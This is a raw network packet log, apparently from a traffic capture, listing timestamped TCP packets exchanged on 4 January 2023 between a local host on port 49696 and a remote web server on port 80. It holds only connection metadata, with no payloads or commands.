Jan 4, 2023 16:47:45.320766926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320770979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320791006 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320792913 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320815086 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320816040 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320838928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320847988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320858955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320877075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320889950 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320913076 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320919037 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320938110 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320964098 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.320976973 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.320991039 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321008921 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321019888 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321043968 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321047068 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321069002 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321074009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321088076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321094990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321114063 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321115017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321135044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321135044 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321155071 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321161032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321176052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321186066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321194887 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321208954 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321214914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321232080 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321233988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321254969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321255922 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321274996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321289062 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321295023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321315050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321321011 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321335077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321352959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321356058 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321372986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321378946 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321393013 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321412086 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321413994 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321430922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321448088 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321449995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321470976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321480989 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321491003 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321510077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321528912 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321532965 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321536064 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321548939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321568966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321572065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321589947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321597099 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321609020 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321613073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321629047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321638107 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321650028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321669102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321671009 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321687937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321705103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321707010 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321727991 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321736097 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321748018 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321765900 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321778059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321785927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321796894 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321805954 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321825027 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321831942 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321846008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321851969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321866989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321871042 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321887016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321892977 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321908951 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321927071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321928024 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321948051 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321958065 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.321968079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321986914 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.321994066 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322006941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322026014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322026014 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322046995 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322051048 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322067976 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322082996 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322087049 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322107077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322109938 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322127104 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322132111 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322146893 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322165966 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322165966 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322185993 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322191000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322206974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322230101 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322242975 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322247982 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322252989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322263956 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322266102 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322274923 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322288036 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322290897 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322308064 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322314978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322328091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322348118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322355032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322355032 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322370052 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322385073 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322390079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322410107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322418928 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322429895 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322448969 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322453022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322468996 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322474957 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322489023 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322508097 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322520018 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322526932 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322530985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322546959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322565079 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322566032 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.322607040 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.322634935 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.327408075 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.328285933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331386089 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331417084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331439972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331463099 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331496000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331537008 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331541061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331578016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331604958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331628084 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331650972 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331672907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331687927 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331703901 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331715107 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331739902 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331748009 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331762075 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331772089 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331780910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331815958 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331826925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331844091 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331851006 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331871986 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331883907 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331897974 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331911087 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331923962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331931114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331950903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.331953049 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331975937 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.331979990 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332000017 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332015991 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332034111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332042933 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332065105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332078934 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332091093 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332118988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332118988 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332144022 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332144022 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332165003 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332170963 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332181931 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332195044 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332212925 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332220078 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332235098 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332243919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332266092 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332268000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332284927 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332303047 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332314014 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332324028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332338095 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332350016 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332365990 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332375050 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332396030 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332400084 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332420111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332427979 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332442999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332465887 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332468033 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332489967 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332510948 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332515955 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332532883 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332552910 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332559109 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332581997 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332583904 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332603931 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332623959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332629919 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332640886 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332653046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.332674026 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.332695007 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342181921 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342217922 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342243910 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342271090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342297077 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342314959 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342325926 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342353106 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342360020 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342376947 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342401028 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342403889 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342423916 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342439890 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342448950 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342472076 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342473030 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342494965 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342503071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342516899 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342530012 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342541933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342550039 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342573881 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342575073 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342597961 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342601061 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342619896 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342626095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342648029 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342652082 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342667103 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342675924 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342700005 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342721939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342725992 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342750072 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342773914 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342776060 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342793941 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342803955 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342817068 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342828989 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342852116 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342855930 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342879057 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342907906 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342922926 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342937946 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342951059 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.342968941 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.342995882 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343024015 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343050957 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343079090 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343106985 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343107939 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343138933 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343166113 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343178988 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343194962 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343202114 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343223095 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343238115 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343251944 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343259096 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343276978 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343281031 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343310118 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343311071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343333960 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343336105 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343364000 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343364000 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343378067 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343388081 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343401909 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343413115 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343432903 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343451023 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343457937 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343480110 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343483925 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343508959 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343509912 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343538046 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343556881 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343580008 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343602896 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343621969 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343627930 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343650103 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343668938 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343691111 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343697071 CET	49696	80	192.168.2.4	66.235.200.147
Jan 4, 2023 16:47:45.343713999 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343738079 CET	80	49696	66.235.200.147	192.168.2.4
Jan 4, 2023 16:47:45.343738079 CET	49696	80	192.168.2.4	66.235.200.147
